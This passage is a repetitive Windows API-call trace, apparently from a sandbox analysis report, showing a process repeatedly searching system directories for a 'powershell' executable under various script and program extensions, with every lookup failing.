	[0349.834] SetErrorMode (uMode=0x1) returned 0x1
	[0349.834] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBE", lpFindFileData=0x1c92dfe0 | out: lpFindFileData=0x1c92dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0349.842] SetErrorMode (uMode=0x1) returned 0x1
	[0349.843] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c92de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0349.844] SetErrorMode (uMode=0x1) returned 0x1
	[0349.844] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JS", lpFindFileData=0x1c92dfe0 | out: lpFindFileData=0x1c92dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0349.852] SetErrorMode (uMode=0x1) returned 0x1
	[0349.853] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c92de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0349.853] SetErrorMode (uMode=0x1) returned 0x1
	[0349.853] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JSE", lpFindFileData=0x1c92dfe0 | out: lpFindFileData=0x1c92dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0349.862] SetErrorMode (uMode=0x1) returned 0x1
	[0349.863] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c92de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0349.863] SetErrorMode (uMode=0x1) returned 0x1
	[0349.863] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSF", lpFindFileData=0x1c92dfe0 | out: lpFindFileData=0x1c92dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0349.936] SetErrorMode (uMode=0x1) returned 0x1
	[0349.938] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c92de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0349.938] SetErrorMode (uMode=0x1) returned 0x1
	[0349.938] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSH", lpFindFileData=0x1c92dfe0 | out: lpFindFileData=0x1c92dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0350.275] SetErrorMode (uMode=0x1) returned 0x1
	[0350.277] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c92de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0350.277] SetErrorMode (uMode=0x1) returned 0x1
	[0350.277] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.MSC", lpFindFileData=0x1c92dfe0 | out: lpFindFileData=0x1c92dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0350.285] SetErrorMode (uMode=0x1) returned 0x1
	[0350.286] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c92de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0350.286] SetErrorMode (uMode=0x1) returned 0x1
	[0350.286] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell", lpFindFileData=0x1c92dfe0 | out: lpFindFileData=0x1c92dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0350.294] SetErrorMode (uMode=0x1) returned 0x1
	[0350.295] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c92de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0350.295] SetErrorMode (uMode=0x1) returned 0x1
	[0350.296] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.ps1", lpFindFileData=0x1c92dfe0 | out: lpFindFileData=0x1c92dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0350.296] SetErrorMode (uMode=0x1) returned 0x1
	[0350.296] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c92de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0350.296] SetErrorMode (uMode=0x1) returned 0x1
	[0350.296] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psm1", lpFindFileData=0x1c92dfe0 | out: lpFindFileData=0x1c92dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0350.297] SetErrorMode (uMode=0x1) returned 0x1
	[0350.297] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c92de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0350.297] SetErrorMode (uMode=0x1) returned 0x1
	[0350.297] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psd1", lpFindFileData=0x1c92dfe0 | out: lpFindFileData=0x1c92dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0350.297] SetErrorMode (uMode=0x1) returned 0x1
	[0350.297] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c92de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0350.297] SetErrorMode (uMode=0x1) returned 0x1
	[0350.298] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.COM", lpFindFileData=0x1c92dfe0 | out: lpFindFileData=0x1c92dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0350.298] SetErrorMode (uMode=0x1) returned 0x1
	[0350.298] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c92de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0350.298] SetErrorMode (uMode=0x1) returned 0x1
	[0350.298] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.EXE", lpFindFileData=0x1c92dfe0 | out: lpFindFileData=0x1c92dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0350.298] SetErrorMode (uMode=0x1) returned 0x1
	[0350.299] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c92de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0350.299] SetErrorMode (uMode=0x1) returned 0x1
	[0350.299] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.BAT", lpFindFileData=0x1c92dfe0 | out: lpFindFileData=0x1c92dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0350.299] SetErrorMode (uMode=0x1) returned 0x1
	[0350.299] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c92de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0350.299] SetErrorMode (uMode=0x1) returned 0x1
	[0350.299] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.CMD", lpFindFileData=0x1c92dfe0 | out: lpFindFileData=0x1c92dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0350.300] SetErrorMode (uMode=0x1) returned 0x1
	[0350.300] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c92de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0350.300] SetErrorMode (uMode=0x1) returned 0x1
	[0350.300] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBS", lpFindFileData=0x1c92dfe0 | out: lpFindFileData=0x1c92dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0350.300] SetErrorMode (uMode=0x1) returned 0x1
	[0350.300] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c92de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0350.301] SetErrorMode (uMode=0x1) returned 0x1
	[0350.301] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBE", lpFindFileData=0x1c92dfe0 | out: lpFindFileData=0x1c92dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0350.310] SetErrorMode (uMode=0x1) returned 0x1
	[0350.310] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c92de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0350.310] SetErrorMode (uMode=0x1) returned 0x1
	[0350.310] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JS", lpFindFileData=0x1c92dfe0 | out: lpFindFileData=0x1c92dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0350.310] SetErrorMode (uMode=0x1) returned 0x1
	[0350.310] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c92de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0350.311] SetErrorMode (uMode=0x1) returned 0x1
	[0350.311] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JSE", lpFindFileData=0x1c92dfe0 | out: lpFindFileData=0x1c92dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0350.311] SetErrorMode (uMode=0x1) returned 0x1
	[0350.311] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c92de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0350.311] SetErrorMode (uMode=0x1) returned 0x1
	[0350.311] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSF", lpFindFileData=0x1c92dfe0 | out: lpFindFileData=0x1c92dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0350.311] SetErrorMode (uMode=0x1) returned 0x1
	[0350.312] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c92de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0350.312] SetErrorMode (uMode=0x1) returned 0x1
	[0350.312] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSH", lpFindFileData=0x1c92dfe0 | out: lpFindFileData=0x1c92dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0350.312] SetErrorMode (uMode=0x1) returned 0x1
	[0350.312] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c92de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0350.312] SetErrorMode (uMode=0x1) returned 0x1
	[0350.312] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.MSC", lpFindFileData=0x1c92dfe0 | out: lpFindFileData=0x1c92dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0350.313] SetErrorMode (uMode=0x1) returned 0x1
	[0350.313] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c92de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0350.313] SetErrorMode (uMode=0x1) returned 0x1
	[0350.313] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell", lpFindFileData=0x1c92dfe0 | out: lpFindFileData=0x1c92dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0350.313] SetErrorMode (uMode=0x1) returned 0x1
	[0350.313] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c92de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0350.313] SetErrorMode (uMode=0x1) returned 0x1
	[0350.314] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.ps1", lpFindFileData=0x1c92dfe0 | out: lpFindFileData=0x1c92dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0350.314] SetErrorMode (uMode=0x1) returned 0x1
	[0350.314] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c92de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0350.314] SetErrorMode (uMode=0x1) returned 0x1
	[0350.314] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psm1", lpFindFileData=0x1c92dfe0 | out: lpFindFileData=0x1c92dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0350.314] SetErrorMode (uMode=0x1) returned 0x1
	[0350.315] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c92de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0350.315] SetErrorMode (uMode=0x1) returned 0x1
	[0350.315] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psd1", lpFindFileData=0x1c92dfe0 | out: lpFindFileData=0x1c92dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0350.315] SetErrorMode (uMode=0x1) returned 0x1
	[0350.315] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c92de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0350.315] SetErrorMode (uMode=0x1) returned 0x1
	[0350.315] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.COM", lpFindFileData=0x1c92dfe0 | out: lpFindFileData=0x1c92dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0350.316] SetErrorMode (uMode=0x1) returned 0x1
	[0350.316] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c92de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0350.316] SetErrorMode (uMode=0x1) returned 0x1
	[0350.316] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.EXE", lpFindFileData=0x1c92dfe0 | out: lpFindFileData=0x1c92dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0350.316] SetErrorMode (uMode=0x1) returned 0x1
	[0350.316] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c92de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0350.704] SetErrorMode (uMode=0x1) returned 0x1
	[0350.705] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.BAT", lpFindFileData=0x1c92dfe0 | out: lpFindFileData=0x1c92dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0350.705] SetErrorMode (uMode=0x1) returned 0x1
	[0350.705] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c92de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0350.705] SetErrorMode (uMode=0x1) returned 0x1
	[0350.705] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.CMD", lpFindFileData=0x1c92dfe0 | out: lpFindFileData=0x1c92dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0350.705] SetErrorMode (uMode=0x1) returned 0x1
	[0350.706] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c92de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0350.706] SetErrorMode (uMode=0x1) returned 0x1
	[0350.706] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBS", lpFindFileData=0x1c92dfe0 | out: lpFindFileData=0x1c92dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0350.706] SetErrorMode (uMode=0x1) returned 0x1
	[0350.706] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c92de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
